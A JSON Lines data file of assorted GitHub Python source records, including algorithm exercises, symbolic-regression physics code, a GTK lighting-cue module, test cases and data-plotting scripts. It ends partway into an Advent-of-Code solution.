+{"seq_id":"24814917323","text":"# swea 1213 String\n\nfor tc in range(1,11):\n T = int(input())\n word = input()\n data = input()\n ans = 0\n for i in range(len(data)-len(word)+1):\n if data[i:i+len(word)] == word:\n ans+=1\n print(f'#{tc} {ans}')","repo_name":"JiIJu/algorithm_algorithm","sub_path":"학사 지이주/2023/7월/0731/1213.py","file_name":"1213.py","file_ext":"py","file_size_in_byte":241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73405695468","text":"'''written by Adam Purnomo'''\n\nimport HLsearch as HL\nimport numpy as np\n\nfrom sympy import symbols, simplify, derive_by_array\n\nimport sympy\nimport torch\nimport sys\nsys.path.append(r'../../HLsearch/')\n\n\ndef LagrangianLibraryTensor(x, xdot, expr, states, states_dot, scaling=False, scales=None):\n \"\"\"\n A function dedicated to build time-series tensor for the lagrangian equation.\n The lagrangian equation is described as follow\n L = sum(c_k*phi_k)\n q_tt = (D^2L_qdot2)^-1*(tau + DL_q - D^2L_qdotq)\n\n #Params:\n x : values of state variables in torch tensor. In [x,x_dot] format. Each row presents states at one time\n xdot : values of states_dot variables in torch tensor. In [x_dot,x_doubledot] format. Each row presents states at one time\n expr : list of basis function (str) (d,)\n states : list states variable description (str) (n,)\n states_dot : time derivative state_variable (str) (n,)\n\n #Return:\n Zeta : time-series of double derivative of basis functions w.r.t qdot and qdot \n Eta : time-series of double derivative of basis functions w.r.t qdot and q \n Delta : time-series of derivative of basis functions w.r.t q \n \"\"\"\n from torch import cos, sin\n x = torch.from_numpy(x)\n xdot = torch.from_numpy(xdot)\n n = len(states)\n q = sympy.Array(np.array(sympy.Matrix(states[:n//2])).squeeze().tolist())\n qdot = sympy.Array(\n np.array(sympy.Matrix(states[n//2:])).squeeze().tolist())\n phi = sympy.Array(np.array(sympy.Matrix(expr)).squeeze().tolist())\n phi_q = derive_by_array(phi, q)\n phi_qdot = derive_by_array(phi, qdot)\n phi_qdot2 = derive_by_array(phi_qdot, qdot)\n phi_qdotq = derive_by_array(phi_qdot, q)\n\n i, j, k = np.array(phi_qdot2).shape\n l = x.shape[0]\n Delta = torch.ones(j, k, l)\n Zeta = torch.ones(i, j, k, l)\n Eta = torch.ones(i, j, k, l)\n\n for idx in range(len(states)):\n locals()[states[idx]] = x[:, idx]\n locals()[states_dot[idx]] = xdot[:, idx]\n\n for n in range(j):\n for o in range(k):\n delta = eval(str(phi_q[n, o]))\n if(isinstance(delta, int)):\n Delta[n, o, :] = delta*Delta[n, o, :]\n else:\n # Feature Scaling\n if(scaling == True):\n scales = torch.max(delta) - torch.min(delta)\n delta = delta/scales\n Delta[n, o, :] = delta\n\n for m in range(i):\n for n in range(j):\n for o in range(k):\n zeta = eval(str(phi_qdot2[m, n, o]))\n eta = eval(str(phi_qdotq[m, n, o]))\n\n if(isinstance(zeta, int)):\n Zeta[m, n, o, :] = zeta*Zeta[m, n, o, :]\n else:\n # Feature Scaling\n if(scaling == True):\n scales = torch.max(zeta) - torch.min(zeta)\n zeta = zeta/scales\n Zeta[m, n, o, :] = zeta\n\n if(isinstance(eta, int)):\n Eta[m, n, o, :] = eta*Eta[m, n, o, :]\n else:\n # Feature Scaling\n if(scaling == True):\n scales = torch.max(eta) - torch.min(eta)\n eta = eta/scales\n Eta[m, n, o, :] = eta\n return Zeta, Eta, Delta\n\n\ndef lagrangianforward(coef, Zeta, Eta, Delta, xdot, device):\n \"\"\"\n Computing time series of q_tt (q double dot) prediction\n #Params:\n coef : Coefficient corresponding to each basis function\n mask : filter for coefficient below a certain threshold\n Zeta : time-series of double derivative of basis functions w.r.t qdot and qdot \n Eta : time-series of double derivative of basis functions w.r.t qdot and q \n Delta : time-series of derivative of basis functions w.r.t q \n xdot : Time-series of states_dot data \n \"\"\"\n weight = coef\n DL_q = torch.einsum('jkl,k->jl', Delta, weight)\n DL_qdot2 = torch.einsum('ijkl,k->ijl', Zeta, weight)\n DL_qdotq = torch.einsum('ijkl,k->ijl', Eta, weight)\n\n if(torch.is_tensor(xdot) == False):\n xdot = torch.from_numpy(xdot).to(device).float()\n q_t = xdot[:, :2].T\n\n C = torch.einsum('ijl,il->jl', DL_qdotq, q_t)\n B = DL_q\n A = torch.einsum('ijl->lij', DL_qdot2)\n invA = torch.linalg.pinv(A)\n invA = torch.einsum('lij->ijl', invA)\n q_tt = torch.einsum('ijl,jl->il', invA, B-C)\n return q_tt\n\n\ndef ELforward(coef, Zeta, Eta, Delta, xdot, device):\n \"\"\"\n Computing time series of total sum of Euler-Lagrange equation\n #Params:\n coef : Coefficient corresponding to each basis function\n Zeta : time-series of double derivative of basis functions w.r.t qdot and qdot \n Eta : time-series of double derivative of basis functions w.r.t qdot and q \n Delta : time-series of derivative of basis functions w.r.t q \n xdot : Time-series of states_dot data \n\n #Returns:\n El : Time series of the left hand side of Euler's Lagranges equation (n, time-series)\n \"\"\"\n weight = coef\n DL_q = torch.einsum('jkl,k->jl', Delta, weight)\n DL_qdot2 = torch.einsum('ijkl,k->ijl', Zeta, weight)\n DL_qdotq = torch.einsum('ijkl,k->ijl', Eta, weight)\n n = xdot.shape[1]\n\n if(torch.is_tensor(xdot) == False):\n xdot = torch.from_numpy(xdot).to(device).float()\n q_t = xdot[:, :n//2].T\n q_tt = xdot[:, n//2:].T\n\n C = torch.einsum('ijl,il->jl', DL_qdotq, q_t)\n B = DL_q\n A = torch.einsum('ijl,il->jl', DL_qdot2, q_tt)\n EL = A + C - B\n return EL\n\n\ndef Upsilonforward(Zeta, Eta, Delta, xdot, device):\n \"\"\"\n Computing time series of total sum of Euler-Lagrange equation\n #Params:\n Zeta : time-series of double derivative of basis functions w.r.t qdot and qdot \n Eta : time-series of double derivative of basis functions w.r.t qdot and q \n Delta : time-series of derivative of basis functions w.r.t q \n xdot : Time-series of states_dot data \n\n #Returns:\n Upsilon : Time series of the left hand side of Euler's Lagranges equation before multiplied with weight (n, time-series)\n \"\"\"\n n = xdot.shape[1]\n\n if(torch.is_tensor(xdot) == False):\n xdot = torch.from_numpy(xdot).to(device).float()\n q_t = xdot[:, :n//2].T\n q_tt = xdot[:, n//2:].T\n\n A = torch.einsum('ijkl,il->jkl', Zeta, q_tt)\n B = torch.einsum('ijkl,il->jkl', Eta, q_t)\n C = Delta\n\n Upsilon = A + B - C\n return Upsilon\n\n\ndef tauforward(coef, Zeta, Eta, Delta, xdot, device):\n '''\n Computing time series of tau (external input) prediction\n #Params:\n coef : Coefficient corresponding to each basis function\n mask : filter for coefficient below a certain threshold\n Zeta : time-series of double derivative of basis functions w.r.t qdot and qdot \n Eta : time-series of double derivative of basis functions w.r.t qdot and q \n Delta : time-series of derivative of basis functions w.r.t q \n xdot : Time-series of states_dot data \n '''\n weight = coef\n DL_q = torch.einsum('jkl,k->jl', Delta, weight)\n DL_qdot2 = torch.einsum('ijkl,k->ijl', Zeta, weight)\n DL_qdotq = torch.einsum('ijkl,k->ijl', Eta, weight)\n\n if(torch.is_tensor(xdot) == False):\n xdot = torch.from_numpy(xdot).to(device).float()\n q_t = xdot[:, :2].T\n q_tt = xdot[:, 2:].T\n\n C = torch.einsum('ijl,il->jl', DL_qdotq, q_t)\n B = DL_q\n A = torch.einsum('ijl,il->jl', DL_qdot2, q_tt)\n tau = A + C - B\n return tau\n\n\ndef SymGradient(func_description, q):\n '''\n Symbolic gradient of list of basis function w.r.t quantity q where q is subset of the states (can be position, velocity or acceleration)\n #Params:\n func_description : list of basis functions (str) (d,)\n q : list of a quantity subset of the states (str) (d,)\n\n #Retuns:\n dfunc_dq : gradient of basis functions w.r.t q (sympy matrix) (d,n)\n '''\n q = sympy.Matrix(q)\n func_description = sympy.Matrix(func_description)\n dfunc_dq = simplify(func_description.jacobian(q))\n return dfunc_dq\n\n\ndef TimeDerivativeSym(func_description, states, states_dot):\n '''\n Symbolic time derivative of basis function\n\n #Params:\n func_description : list basis functions (str) (d,)\n states : list states variable description (str) (n,)\n states_dot : time derivative state_variable (str) (n,)\n\n #Return\n dfunc_dt : symbolic time derivative of basis functions list (sympy matrix) (d,)\n '''\n func = sympy.Matrix(func_description)\n x = sympy.Matrix(states)\n x_dot = sympy.Matrix(states_dot)\n grad = func.jacobian(x)\n dfunc_dt = grad*x_dot\n return dfunc_dt\n\n\ndef TimeDerivativeSymGradient(gradfunc_description, states, states_dot):\n '''\n Symbolic time derivative of gradient of basis function w.r.t. quantity q which is a subset of the states\n\n #Params:\n gradfunc_description : gradient of basis function w.r.t. quantity q (sympy matrix) (d,n)\n states : list states variable description (str) (n,)\n states_dot : time derivative state_variable (str) (n,)\n\n\n #Return\n dgradfunc_description_dt : Symbolic time derivative of gradient of basis function w.r.t. quantity q (sympy matrix) (d,n)\n '''\n x = sympy.Matrix(states)\n x_dot = sympy.Matrix(states_dot)\n\n temp = gradfunc_description[:, 0].jacobian(x)*x_dot\n for i in range(1, len(states)//2):\n temp = temp.row_join(gradfunc_description[:, i].jacobian(x)*x_dot)\n dgradfunc_description_dt = temp\n return dgradfunc_description_dt\n\n\ndef SymVectorFuncSumOverStates(matrix_func):\n '''\n Sum of gradient of symbolic basis function over states\n #Params\n matrix_fun : gradient of symbolic basis function (sympy matrix) (d,n)\n\n #Return\n Sigma : sum of gradeitn of symbolic basis function over states (sympy matrix) (d) \n '''\n\n p, m = matrix_func.shape\n sigma = matrix_func[:, 0]\n for i in range(1, m):\n sigma += matrix_func[:, i]\n return sigma\n\n\ndef timeDerivativeLibraryMatrix(x, xdot, function_description, states, states_dot):\n \"\"\"\n #Params:\n x : values of state variables in torch tensor. In [x,x_dot] format. Each row presents states at one time\n xdot : values of states_dot variables in torch tensor. In [x_dot,x_doubledot] format. Each row presents states at one time\n function_description : list of basis functions (str) (d,)\n states : list states variable description (str) (n,)\n states_dot : time derivative state_variable (str) (n,)\n\n #Return:\n time-series of time-derivative functions in torch.tensor\n \"\"\"\n df_dt = TimeDerivativeSym(function_description, states, states_dot)\n df_dt = [str(f) for f in df_dt]\n from torch import cos, sin\n if((torch.is_tensor(x) == False) or (torch.is_tensor(xdot) == False)):\n x = torch.from_numpy(x)\n xdot = torch.from_numpy(xdot)\n\n column = []\n n = len(states)\n # Assign data to states and states dot\n for j in range(n):\n locals()[states[j]] = x[:, j]\n locals()[states_dot[j]] = xdot[:, j]\n # evaluate each function in function expression with data\n for func in df_dt:\n column.append(eval(func))\n column = torch.stack(column)\n column = column.T\n return column\n\n\ndef LibraryMatrix(x, function_description, states, scaling=True):\n \"\"\"\n #Params:\n x : values of variables in torch tensor. In [x,x_dot] format. Each row presents states at one time\n function_description : list of basis functions (str) (d,)\n states : symbolic states' names (str)\n\n #Return:\n time-serie of calculated functions in torch.tensor\n \"\"\"\n\n from torch import cos, sin\n if(torch.is_tensor(x) == False):\n x = torch.from_numpy(x)\n\n column = []\n n = len(states)\n # Assign data to data_description (states)\n for j in range(n):\n locals()[states[j]] = x[:, j]\n # evaluate each function in function expression with data\n for func in function_description:\n k = eval(func)\n if(isinstance(k, int)):\n column.append(k*torch.ones(x.shape[0]))\n else:\n # Feature Scaling\n if(scaling == True):\n scales = torch.max(k) - torch.min(k)\n k = k/scales\n column.append(k)\n column = torch.stack(column)\n column = column.T\n return column\n\n\ndef timeDerivativeLibraryTensor(x, xdot, matrix_func, states, states_dot):\n \"\"\"\n #Params:\n x : values of state variables in torch tensor. In [x,x_dot] format. Each row presents states at one time\n xdot : values of states_dot variables in torch tensor. In [x_dot,x_doubledot] format. Each row presents states at one time\n matrix_func : matrix of basis functions (str) (d,n)\n states : list states variable description (str) (n,)\n states_dot : time derivative state_variable (str) (n,)\n\n #Return:\n time-series of time-derivative functions in torch.tensor\n \"\"\"\n from torch import cos, sin\n if((torch.is_tensor(x) == False) or (torch.is_tensor(xdot) == False)):\n x = torch.from_numpy(x)\n xdot = torch.from_numpy(xdot)\n\n d, n = matrix_func.shape[0], len(states)\n b = x.shape[0]\n Eta = torch.ones(d, n//2, b)\n\n # Assign data to states and states dot\n for j in range(n):\n locals()[states[j]] = x[:, j]\n locals()[states_dot[j]] = xdot[:, j]\n\n # evaluate each function in function expression with data\n for i in range(matrix_func.shape[0]):\n for j in range(matrix_func.shape[1]):\n k = eval(str(matrix_func[i, j]))\n if(isinstance(k, int)):\n Eta[i, j, :] = k*Eta[i, j, :]\n else:\n Eta[i, j, :] = k\n return Eta\n","repo_name":"AdamPurnomo/Extended-Lagrangian-SINDy-xL-SINDy-","sub_path":"Source/Python Script/xLSINDy.py","file_name":"xLSINDy.py","file_ext":"py","file_size_in_byte":14238,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"17490754793","text":"\"\"\"\nDefinition of TreeNode:\nclass TreeNode:\n def __init__(self, val):\n self.val = val\n self.left, self.right = None, None\n\nExample of iterate a tree:\niterator = BSTIterator(root)\nwhile iterator.hasNext():\n node = iterator.next()\n do something for node\n\"\"\"\n\n\nclass BSTIterator:\n \"\"\"\n @param: root: The root of binary tree.\n \"\"\"\n def __init__(self, root):\n self.stack = []\n self.node = root\n\n \"\"\"\n @return: True if there has next node, or false\n \"\"\"\n def hasNext(self):\n return self.node or self.stack\n\n \"\"\"\n @return: return next node\n \"\"\"\n def next(self):\n node = self.node\n stack = self.stack\n\n while node:\n stack.append(node)\n node = node.left\n\n node = stack.pop()\n\n nxt = node\n\n self.node = node.right\n\n return nxt\n","repo_name":"jaychsu/algorithm","sub_path":"lintcode/86_binary_search_tree_iterator.py","file_name":"86_binary_search_tree_iterator.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","stars":130,"dataset":"github-code","pt":"37"} +{"seq_id":"26086633587","text":"from components.orders.order import Order, StopOrder, LimitOrder\n\n\nclass OrderManager:\n def __init__(self, strategy):\n self.orders = []\n self.strategy = strategy\n self.symbol = strategy.symbol\n if strategy is None:\n raise ValueError('Strategy is required')\n\n\n def market_order(self, side: str, quantity: int):\n order = Order(\n type='market',\n side=side,\n qty=quantity,\n symbol=self.symbol.symbol,\n filled_avg_price=self.strategy.data.close,\n timestamp=self.strategy.data.timestamp,\n )\n self.orders.append(order)\n return order\n\n def stop_loss_order(self, side: str, quantity: int, price: float):\n order = StopOrder(\n type='stop',\n side=side,\n qty=quantity,\n symbol=self.symbol.symbol,\n stop_price=price,\n timestamp=None,\n )\n self.orders.append(order)\n return order\n\n def limit_order(self, side: str, quantity: int, price: float):\n order = LimitOrder(\n type='limit',\n side=side,\n qty=quantity,\n symbol=self.symbol.symbol,\n limit_price=price,\n timestamp=None,\n )\n self.orders.append(order)\n return order\n\n def add(self, order: Order):\n self.orders.append(order)\n\n def all(self):\n return self.orders\n\n def filter(self, **kwargs):\n return [o for o in self.orders if all([o.__getattribute__(k) == v for k, v in kwargs.items()])]\n\n def __len__(self):\n return len(self.orders)\n\n def summary(self):\n return {\n 'total': len(self.orders),\n }\n\n def show(self):\n print('showing orders for strategy: {}'.format(self.strategy.name))\n print('\\n'.join([str(o) for o in self.orders]))","repo_name":"robswc/stratis","sub_path":"app/components/orders/order_manager.py","file_name":"order_manager.py","file_ext":"py","file_size_in_byte":1884,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"37"} +{"seq_id":"72777157546","text":"class Employee():\n no_of_leave= 8\n def __init__(self,aname , asaalary, arole): # init func. don't requires no calling\n self.name = aname\n self.salary = asaalary\n self.role = arole\n def printditails(self):\n return f\"name is {self.rohan} and salary is {self.salary} and role is {self.role}\"\n @classmethod\n def chnge_leaves(cls , newleaves):\n cls.no_of_leave = newleaves\n\n\nharry = Employee('harry', 40384 ,'instructur')\nrohan = Employee('rohan',10338,'student')# construtor\n\nharry.chnge_leaves(33)\n\nprint (harry.no_of_leave)\n","repo_name":"KojoAning/PYHTON_PRACTICE","sub_path":"opps4.py","file_name":"opps4.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35125523326","text":"from xmllib import XMLParser\nfrom os import path\nimport string\nimport lightboard\nfrom ExpatXMLParser import ExpatXMLParser, DOMNode\nimport gtk\nfrom gtk import *\nfrom gtk.glade import *\nfrom completion import completion\nimport time\nimport instrument\nimport string\nimport cue_edit\n\nfrom omniORB import CORBA\nfrom idl import LB, LB__POA\n\nedit_menu=None\n\ndef initialize():\n reset()\n\ndef reset():\n global edit_menu\n lb.cue={}\n gdk.threads_enter()\n menubar=lb.menubar\n for m in menubar.get_children():\n if (m.get_children()[0].get() == \"Cue\"):\n menubar.remove(m)\n\n cue1=gtk.MenuItem(\"Cue\")\n menubar.append(cue1)\n\n cue1_menu=gtk.Menu()\n cue1.set_submenu(cue1_menu)\n\n edit1=gtk.MenuItem(\"Edit\")\n cue1_menu.append(edit1)\n edit_menu=gtk.Menu()\n edit1.set_submenu(edit_menu)\n\n new1=gtk.MenuItem(\"New\")\n new1.connect(\"activate\", newCue_cb, None)\n cue1_menu.append(new1)\n\n menubar.show_all()\n gdk.threads_leave()\n \ndef shutdown():\n pass\n\ndef load(tree):\n for section in tree.find(\"cues\"):\n for cue in section.find(\"cue\"):\n c=Cue(cue.attrs['name'])\n for parent in cue.find(\"parent\"):\n l = parent.attrs['level']\n if l[-1]=='%':\n l=l[:-1]\n l=float(l)\n c.parent.append([string.strip(parent.data), l])\n for instrument in cue.find(\"instrument\"):\n for key, value in instrument.attrs.items():\n if key == \"name\": continue\n if not c.instrument.has_key(instrument.attrs['name']):\n c.instrument[instrument.attrs['name']]={}\n c.instrument[instrument.attrs['name']][key]=value\n\n for c in lb.cue.values():\n c.validate()\n \ndef save():\n tree = DOMNode('cues')\n for i in lb.cue.values():\n tree.append(i.to_tree())\n return tree\n\ndef newCue_cb(widget, data=None):\n # called from menu\n gdk.threads_leave()\n c = Cue('', update_refs=0)\n editor = cue_edit.CueEditor()\n c.editor = editor\n c.set_editing(1)\n editor.set_cue(c)\n editor.edit()\n gdk.threads_enter()\n \n\nclass Cue:\n def __init__(self, name, update_refs=1):\n self.instrument={}\n self.apparent={}\n self.valid=0\n self.build_time=0\n self.parent=[]\n self.name=name\n self.core_cue = LB.Cue(name, [])\n self.editor=None\n self.edit_menu_item = None\n\n if (update_refs):\n self.update_refs()\n\n def update_refs(self):\n gdk.threads_enter()\n try:\n if (lb.cue.has_key(self.name)):\n old = lb.cue[self.name]\n edit_menu.remove(old.edit_menu_item)\n\n lb.cue[self.name]=self\n \n i=gtk.MenuItem(self.name)\n self.edit_menu_item=i\n edit_menu.append(i)\n i.connect(\"activate\", self.edit_cb, None)\n i.show()\n finally:\n gdk.threads_leave()\n\n def has_parent(self, name):\n if (self.name == name):\n return 1\n for (pname, level) in self.parent:\n if (lb.cue[pname].has_parent(name)):\n return 1\n return 0\n\n def send_update(self):\n tree = DOMNode('cues')\n tree.append(self.to_tree())\n lb.sendData(tree)\n\n def invalidate(self):\n self.valid = 0\n self.apparent={}\n self.build_time=0\n self.validate()\n \n def validate(self):\n for name, lvl in self.parent:\n lb.cue[name].validate()\n if (lb.cue[name].build_time <= self.build_time):\n continue\n if (self.valid):\n self.apparent={}\n self.valid=0\n self.build_time=0\n if (not self.valid):\n for name, lvl in self.parent:\n for name, idict in lb.cue[name].apparent.items():\n if (not self.apparent.has_key(name)):\n self.apparent[name]={}\n for attr, value in idict.items():\n if (attr=='level'):\n value = lb.value_to_string('level', [lb.value_to_core ('level', value)[0] * (lvl/100.0)])\n self.apparent[name][attr]=value\n for name, idict in self.instrument.items():\n if (not self.apparent.has_key(name)):\n self.apparent[name]={}\n for attr, value in idict.items():\n self.apparent[name][attr]=value\n self.core_cue = self.to_core()\n self.valid=1\n self.build_time=time.time()\n \n def copy(self):\n c = Cue(self.name, update_refs=0)\n c.parent=self.parent[:]\n c.instrument=self.instrument.copy()\n c.edit_menu_item = self.edit_menu_item\n c.invalidate()\n return c\n \n def to_core(self):\n incue = self\n cue = LB.Cue(self.name, [])\n\n for (name, dict) in incue.apparent.items():\n try:\n i = lb.instrument[name].to_core_InstAttrs(dict)\n cue.ins = cue.ins + i\n except:\n pass\n cue.ins=lb.sort_by_attr(cue.ins, 'name') \n return cue\n\n def to_tree(self):\n cue = DOMNode('cue', {'name':self.name})\n for name, lvl in self.parent:\n lvl = lb.value_to_string('level', [lvl])\n parent = DOMNode('parent', {'level':lvl})\n parent.add_data(name)\n cue.append(parent)\n for name, idict in self.instrument.items():\n dict = idict.copy()\n dict['name']=name\n instrument = DOMNode('instrument', dict)\n cue.append(instrument)\n return cue\n\n def edit(self):\n cue = self.copy()\n editor = cue_edit.CueEditor()\n cue.editor = editor\n cue.set_editing(1)\n editor.set_cue(cue)\n editor.edit()\n\n def edit_cb(self, widget, data):\n \"\"\" Called from lightboard->program->edit \"\"\"\n\n gdk.threads_leave()\n self.edit()\n gdk.threads_enter()\n \n def set_editing(self, editing):\n if (editing):\n if (self.edit_menu_item is not None):\n self.edit_menu_item.set_sensitive(0)\n else:\n if (self.edit_menu_item is not None):\n self.edit_menu_item.set_sensitive(1)\n self.editor = None\n \n","repo_name":"inaugust/lb","sub_path":"gtklb/cue.py","file_name":"cue.py","file_ext":"py","file_size_in_byte":6493,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"5173123744","text":"from seal.lib.mr.hit_processor_chain_link import HitProcessorChainLink\nfrom seal.lib.io.sam_formatter import SamFormatter\n\nclass EmitSamLink(HitProcessorChainLink):\n def __init__(self, context, event_monitor, next_link = None):\n super(EmitSamLink, self).__init__(next_link)\n self.ctx = context\n self.output_formatter = SamFormatter(strip_pe_tag=True)\n self.event_monitor = event_monitor\n\n def process(self, original, pair):\n for hit in pair:\n if hit:\n k, v = self.output_formatter.format(hit).split(\"\\t\", 1)\n self.ctx.emit(str(k), str(v))\n self.event_monitor.count(\"emitted sam records\", 1)\n\n super(EmitSamLink, self).process(original, pair) # forward pair to next element in chain\n\nclass RapiEmitSamLink(HitProcessorChainLink):\n def __init__(self, context, event_monitor, hi_rapi_instance, next_link = None):\n super(RapiEmitSamLink, self).__init__(next_link)\n self.ctx = context\n self.event_monitor = event_monitor\n self.hi_rapi = hi_rapi_instance\n\n def process(self, original, rapi_frag):\n with self.event_monitor.time_block(\"format sam\", write_status=False):\n sam_lines = self.hi_rapi.format_sam_for_fragment(rapi_frag).split('\\n')\n with self.event_monitor.time_block(\"emit alignments\", write_status=False):\n for line in sam_lines:\n k, v = line.split(\"\\t\", 1)\n self.ctx.emit(str(k), str(v))\n self.event_monitor.count(\"emitted sam records\", 1)\n\n super(RapiEmitSamLink, self).process(original, rapi_frag) # forward rapi_frag to next element in chain\n","repo_name":"crs4/seal","sub_path":"seal/lib/mr/emit_sam_link.py","file_name":"emit_sam_link.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"71074628588","text":"import unittest\n\nimport datetime\nimport requests\nfrom utils.common.config_loader import ConfigLoader\nfrom base_class import BaseClass\nimport time\nfrom uuid import uuid4\n\n\nclass TestReExtract(BaseClass):\n def assert_done_task(self, task_id, error_count = 0):\n response = TestReExtract.admin_client.get_task(task_id)\n self.assertEqual(200, response.status_code)\n self.assertTaskInfo(response.content[\"task_info\"], task_id, \"list descriptors\", error_count)\n\n def assert_image_not_found(self, task_id, descriptors):\n response = TestReExtract.admin_client.get_task_errors(task_id)\n self.assertEqual(200, response.status_code)\n self.assertEqual(len(descriptors), response.content[\"error_count\"])\n notFoundImages = [error['message'].split(\"Object not found, target id: \")[1] for error in\n response.content[\"errors\"]]\n self.assertSetEqual(set(descriptors), set(notFoundImages))\n\n def check_descriptor_in_new_core(self, descriptor_id):\n new_luna = ConfigLoader.get_property(\"reextract_luna_core_url\")\n response = requests.get(\"{}/descriptors?id={}\".format(new_luna, descriptor_id))\n self.assertEqual(200, response.status_code)\n\n @unittest.skipIf(not ConfigLoader.get_int_property(\"test_reextract\"), \"disable re-extract tests\")\n def test_reextract_several_descriptors(self):\n descriptor_1 = self.createDescriptor(TestReExtract.employer)\n descriptor_2 = self.createDescriptor(TestReExtract.employer)\n\n response = TestReExtract.admin_client.start_reextract_descriptors({\"descriptors\": [descriptor_1, descriptor_2]})\n self.assertEqual(201, response.status_code)\n task_id = response.content[\"task_id\"]\n time.sleep(2)\n self.assert_done_task(task_id)\n for descriptor in (descriptor_1, descriptor_2):\n self.check_descriptor_in_new_core(descriptor)\n\n @unittest.skipIf(not ConfigLoader.get_int_property(\"test_reextract\"), \"disable re-extract tests\")\n def test_bad_json(self):\n error_cases = [{\"params\": {\"descriptor\": [str(uuid4()), str(uuid4())]}},\n {\"params\": {\"descriptors\": str(uuid4())}},\n {\"params\": {\"descriptors\": [str(uuid4()), \"aaa\"]}},\n ]\n for error_case in error_cases:\n with self.subTest(params = error_case[\"params\"]):\n response = TestReExtract.admin_client.start_reextract_descriptors(error_case[\"params\"])\n\n self.assertEqual(400, response.status_code)\n self.assertEqual(response.content[\"error_code\"], 12022)\n self.assertTrue(response.content[\"detail\"].startswith(\"Failed to validate input json. Path:\"))\n\n @unittest.skipIf(not ConfigLoader.get_int_property(\"test_reextract\"), \"disable re-extract tests\")\n def test_reextract_non_exist_descriptor(self):\n descriptor_1 = self.createDescriptor(TestReExtract.employer)\n descriptor_2 = str(uuid4())\n descriptor_3 = str(uuid4())\n\n response = TestReExtract.admin_client.start_reextract_descriptors({\"descriptors\": [descriptor_1, descriptor_2,\n descriptor_3]})\n task_id = response.content[\"task_id\"]\n\n time.sleep(2)\n\n self.assertEqual(201, response.status_code)\n self.assert_done_task(task_id, 2)\n self.assert_image_not_found(task_id, [descriptor_2, descriptor_3])\n","repo_name":"qonteo/luna","sub_path":"luna_v.3.3.3/luna-admin/tests/tests_api/reextract_descriptors.py","file_name":"reextract_descriptors.py","file_ext":"py","file_size_in_byte":3504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70345539307","text":"import GdaImport\r\n#gjden\r\n#example of dumping all the callors of a method\r\ndef GDA_MAIN(gda_obj):\r\n gda=gda_obj\r\n Dex0=gda.DexList[0]\r\n try:\r\n calleeStr=\"\"\r\n for method in Dex0.MethodList:\r\n if len(method.refMethodIdxList)>5:\r\n calleeStr=\"the [%d] callees of the method: %s\\n\\n\" % (len(method.refMethodIdxList),method.methodFullName)\r\n #gda.log(calleeStr)\r\n for calleeidx in method.refMethodIdxList:\r\n index=str(calleeidx)\r\n if index in Dex0.MethodTable:\r\n obj=Dex0.MethodTable[index]\r\n calleeStr+=obj.methodFullName+obj.MethodSignature\r\n else:\r\n calleeStr+=gda.GetMethodNameById(calleeidx)\r\n calleeStr+=\"\\n\"\r\n break;\r\n gda.log(calleeStr)\r\n except Exception as e:\r\n gda.log(str(e))\r\n return 0","repo_name":"charles2gan/GDA-android-reversing-Tool","sub_path":"python sample/example3-callee.py","file_name":"example3-callee.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","stars":3662,"dataset":"github-code","pt":"37"} +{"seq_id":"70815826026","text":"import matplotlib\r\nmatplotlib.use('Agg')\r\n\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\nimport csv\r\n\r\ndef main():\r\n filename = './datasets/craft-cans/beers_clean.csv'\r\n abv_col = 1\r\n ibu_col = 2\r\n style_col = 5\r\n\r\n # filename = './datasets/beer-recipes/recipeData.csv'\r\n # abv_col = 8\r\n # ibu_col = 9\r\n # style_col = 3\r\n\r\n threshold = 10\r\n\r\n data = None\r\n with open(filename, 'r', encoding='latin-1') as f:\r\n data = np.array(list(csv.reader(f))[1:])\r\n\r\n data = data[data[:, abv_col] != '']\r\n data = data[data[:, ibu_col] != '']\r\n data = data[data[:, style_col] != '']\r\n\r\n styles = np.unique(data[:, style_col])\r\n subsets = {key: [] for key in styles}\r\n for row in data:\r\n subsets[row[style_col]].append(row)\r\n\r\n # for k in sorted(subsets):\r\n # data = np.asarray(subsets[k])\r\n # if (len(data) > threshold):\r\n # abv = data[:, abv_col].astype(float)\r\n # ibu = data[:, ibu_col].astype(float)\r\n # labels = data[:, style_col]\r\n\r\n # fig = plt.figure(figsize=(10,5))\r\n # plt.xlabel('ABV')\r\n # plt.ylabel('IBU')\r\n \r\n # plt.scatter(abv, ibu, label=labels, s=50, alpha=.5)\r\n # fig.tight_layout()\r\n # fig.savefig('beers_' + str(k).replace(' ', '_').replace('/', '_') + '.png')\r\n # plt.close(fig)\r\n \r\n fig_all = plt.figure(figsize=(10,5))\r\n plt.xlabel('ABV')\r\n plt.ylabel('IBU')\r\n for k in sorted(subsets):\r\n data = np.asarray(subsets[k])\r\n if (len(data) > threshold):\r\n abv = data[:, abv_col].astype(float)\r\n ibu = data[:, ibu_col].astype(float)\r\n labels = data[:, style_col]\r\n plt.scatter(abv, ibu, label=labels, s=50, alpha=.5)\r\n\r\n fig_all.tight_layout()\r\n fig_all.savefig('all_beers_abv_ibu.png')\r\n plt.close(fig_all)\r\n\r\n \r\n\r\n\r\nif __name__ == '__main__':\r\n main()","repo_name":"ssulkar/466lab1","sub_path":"beer/visualize_data.py","file_name":"visualize_data.py","file_ext":"py","file_size_in_byte":1956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42822718914","text":"\"\"\"\nSee problem.txt for the full problem description\n\nThe score for a single round is the score for the shape you selected \n(1 for Rock, 2 for Paper, and 3 for Scissors) \nplus the score for the outcome of the round \n(0 if you lost, 3 if the round was a draw, and 6 if you won)\n\nRock -> A and X\nPaper -> B and Y\nScissors -> C and Z\n\nInput line format 